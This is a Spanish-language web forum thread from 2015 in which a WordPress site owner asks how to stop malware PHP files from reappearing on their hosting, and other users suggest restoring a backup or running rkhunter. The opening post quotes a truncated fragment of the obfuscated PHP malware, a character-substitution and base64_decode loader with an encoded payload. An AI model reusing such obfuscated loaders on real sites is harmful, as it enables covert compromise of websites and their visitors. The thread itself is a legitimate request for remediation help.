Foros del Web » Soporte técnico » Virus, troyanos y spyware »

Malware crea archivos php en mi hosting. Web Wordpress

Estas en el tema de Malware crea archivos php en mi hosting. Web Wordpress en el foro de Virus, troyanos y spyware en Foros del Web. Hola, Tengo una web Wordpress en el hosting Arsys. El soporte técnico me avisa continuamente de nuevos archivos .php macados como malware y no sé ...
  #1 (permalink)  
Antiguo 29/07/2015, 02:45
 
Fecha de Ingreso: julio-2011
Mensajes: 14
Antigüedad: 13 años, 4 meses
Puntos: 0
Malware crea archivos php en mi hosting. Web Wordpress

Hola,

Tengo una web Wordpress en el hosting Arsys. El soporte técnico me avisa continuamente de nuevos archivos .php macados como malware y no sé que hacer para que dejen de aparecer.

- He instalado el ithemes security en wordpress
- He cambiado los permisos de lectura de archivo a las recomendaciones del plugin ithemes security
- He cambiado todas las contraseñas (ftp, cpanel, wordpress...)
- He añadido en el htaccess la lista de HackRepair.com Blacklist

Son archivos php de unos 150Kb con funciones php

Este es un fragmento:
Cita:
function kjfttvs($xnxfr, $ckdljgklm){$fmycpezf = ''; for($i=0; $i < strlen($xnxfr); $i++){$fmycpezf .= isset($ckdljgklm[$xnxfr[$i]]) ? $ckdljgklm[$xnxfr[$i]] : $xnxfr[$i];}
$ayichn="base64_decode";return $ayichn($fmycpezf);}
$ziguwcw = '9VfwW6vYBz9oek6AsXvAzkb8BAspiGm6tGNdgNdcW1mdzT3fj ZUxnVvxzk6AsXvA'.
'sAspiKcdgNdcW1mdzT3fjZUxn15Dzk6DB13ajVf8nfvlW1afe ANUFZEhZEPYBzHQj'.
'VfLB6vpW1adjZUNMtpMZXfXMVfYsk6lMZHQ0l6C6E6CMCEM7N oee5vtH6e1H6eneaPi05vtH0bVealUICcO'.
'RAihicoee5vtH6e1H6eneae5t0v0H6vPHGHCealUICcOFtiTR 4cwFZDbi4pMZ1fXMZ5fnzPl'.
'7CUEza350fB50fpxC5H005vrzlBI0fjP0EH5H5
gracias

Última edición por jcarranz; 29/07/2015 a las 02:50 Razón: ampliada información
  #2 (permalink)  
Antiguo 29/07/2015, 23:31
Avatar de Tedel  
Fecha de Ingreso: enero-2011
Ubicación: Lima
Mensajes: 2.744
Antigüedad: 13 años, 10 meses
Puntos: 444
Respuesta: Malware crea archivos php en mi hosting. Web Wordpress

¿Has intentado simplemente reinstalar Wordpress y subir tu último backup sano?

Si no lo has hecho, es lo primero que deberías intentar.
__________________
Soy el autor de Heptagrama y tengo un servicio "todo incluido" de marketing web.
  #3 (permalink)  
Antiguo 30/07/2015, 00:14
 
Fecha de Ingreso: julio-2011
Mensajes: 14
Antigüedad: 13 años, 4 meses
Puntos: 0
Respuesta: Malware crea archivos php en mi hosting. Web Wordpress

Restaurar el último backup hubiese sido lo mejor, pero era una versión muy desactualizada respecto a la última versión que es la infectada

Por eso me interesa más una solución que me permita limpiar la versión actual

gracias,
  #4 (permalink)  
Antiguo 30/07/2015, 00:52
Avatar de lauser
Moderator Unix/Linux
 
Fecha de Ingreso: julio-2013
Ubicación: Odessa (Ukrania)
Mensajes: 3.278
Antigüedad: 11 años, 4 meses
Puntos: 401
Respuesta: Malware crea archivos php en mi hosting. Web Wordpress

Has probado a usar herramientas del estilo rkhunter?
Necesitas acceso ssh.
__________________
Los usuarios que te responden, lo hacen altruistamente y sin ánimo de lucro con el único fin de ayudarte. Se paciente y agradecido.
-SOLOLINUX-
  #5 (permalink)  
Antiguo 30/07/2015, 03:24
 
Fecha de Ingreso: julio-2011
Mensajes: 14
Antigüedad: 13 años, 4 meses
Puntos: 0
Respuesta: Malware crea archivos php en mi hosting. Web Wordpress

Cita:
Iniciado por lauser Ver Mensaje
Has probado a usar herramientas del estilo [URL="http://rkhunter.sourceforge.net/"]rkhunter[/URL]?
Necesitas acceso ssh.
Gracias, tengo un perfil más de diseñador y estas herramientas se me atascan bastante

¿tendría el mismo efecto copiarme la web a mi xampp, ejecutar ahí el rkhunter y luego subir la copia limpia de nuevo al hosting?

gracias!
  #6 (permalink)  
Antiguo 30/07/2015, 08:10
Avatar de lauser
Moderator Unix/Linux
 
Fecha de Ingreso: julio-2013
Ubicación: Odessa (Ukrania)
Mensajes: 3.278
Antigüedad: 11 años, 4 meses
Puntos: 401
Respuesta: Malware crea archivos php en mi hosting. Web Wordpress

rkhunter no solo analiza la web... no se si te servirá.
__________________
Los usuarios que te responden, lo hacen altruistamente y sin ánimo de lucro con el único fin de ayudarte. Se paciente y agradecido.
-SOLOLINUX-

Etiquetas: crea, hosting, malware, php, wordpress
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 11:38.